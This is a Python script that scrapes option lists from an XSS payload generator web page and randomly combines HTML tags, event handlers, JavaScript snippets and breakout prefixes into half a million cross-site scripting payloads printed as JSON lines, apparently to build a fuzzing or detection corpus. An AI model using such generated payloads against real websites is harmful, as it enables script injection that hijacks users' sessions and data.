#!/usr/bin/env python
import os
import sys
import json
import pathlib
import requests
import time
import random
import itertools
from functools import partial
from pprint import pprint
from pyquery import PyQuery as pq
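# Cache the option source page locally so repeated runs do not re-fetch it.
# NOTE(review): the cached copy is trusted on later runs; delete it to refresh.
p = pathlib.Path('webgun.html')
if not p.exists():
    url = 'https://brutelogic.com.br/webgun/'
    # A bounded timeout keeps the script from hanging forever on a stalled
    # connection; raise_for_status() stops an error page (e.g. a 5xx body)
    # from being written as the cache and silently reused on every later run.
    r = requests.get(url, timeout=30)
    r.raise_for_status()
    # Pin the encoding so the cache round-trips identically on every platform.
    p.write_text(r.text, encoding='utf-8')
# Parse the cached HTML once; get_options() queries this document.
pageq = pq(p.read_text(encoding='utf-8'))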
def get_options(name, remove_empty=False):
    """Return the ``value`` attribute of every ``<option>`` in the ``<select>`` named *name*.

    Args:
        name: the ``name`` attribute of the ``<select>`` element looked up in
            the module-level ``pageq`` document.
        remove_empty: when true, drop options whose value is the empty string.

    Returns:
        A list of option values in document order.
    """
    select_node = pageq(f'select[name={name}]')
    option_values = pq(select_node)('option').map(lambda _, node: pq(node).attr('value'))
    values = list(option_values)
    if not remove_empty:
        return values
    return [value for value in values if value != '']
# (select name, drop-empty flag) for each slot of the payload template, in
# template order. The tag, handler and js slots never take the empty value;
# every other slot may.
_option_specs = (
    ('extra1', False),
    ('tag', True),
    ('s1', False),
    ('extra2', False),
    ('s2', False),
    ('handler', True),
    ('s3', False),
    ('s4', False),
    ('js', True),
    ('s5', False),
    ('extra3', False),
)
# One value list per slot, then the individual per-slot names for readability.
lists = tuple(get_options(name, remove_empty=drop) for name, drop in _option_specs)
extra1s, tags, s1s, extra2s, s2s, handlers, s3s, s4s, jss, s5s, extra3s = lists
# Template filled with one value from each list per generated sample.
payload_format = '{extra1}<{tag}{s1}{extra2}{s2}{handler}{s3}={s4}{js}{s5}>{extra3}'
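# Sample random combinations rather than enumerating the full product (the
# commented-out exhaustive variant below), which is too large to emit.
n_samples = 500000
# random.choice() raises a bare IndexError on an empty list; fail early with
# a message that points at the likely cause instead.
if not all(lists):
    raise SystemExit('at least one option list is empty; the cached webgun.html may be incomplete')
for i in range(n_samples):
    extra1, tag, s1, extra2, s2, handler, s3, s4, js, s5, extra3 = [random.choice(options) for options in lists]
    # The template has no separator after {tag} or after {extra2}; presumably
    # the space keeps adjacent tokens from running together — TODO confirm.
    if not s1:
        s1 = ' '
    if extra2 and not s2:
        s2 = ' '
    # str.format yields the same text as the original exec()'d f-string (the
    # template is a fixed literal, so no formatting differs), without
    # compiling and executing generated source at runtime.
    payload = payload_format.format(
        extra1=extra1, tag=tag, s1=s1, extra2=extra2, s2=s2, handler=handler,
        s3=s3, s4=s4, js=js, s5=s5, extra3=extra3,
    )
    # Emit the sample once per prefix, one JSON object per line.
    for prefix in ['', '">', "'>", '>']:
        d = {
            'payload': prefix + payload,
        }
        print(json.dumps(d))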
#generate all payloads, but this takes too much time and disk space
#for extra1, tag, s1, extra2, s2, handler, s3, s4, js, s5, extra3 in itertools.product(extra1s, tags, s1s, extra2s, s2s, handlers, s3s, s4s, jss, s5s, extra3s):
# if (not s1):
# s1 = ' '
# if extra2 and (not s2):
# s2 = ' '
# s = f'payload=f\'{payload_format}\''
# exec(s, globals(), locals())
# for prefix in ['', '">', "'>", '>']:
# prefix_payload = prefix+payload
# print(prefix_payload)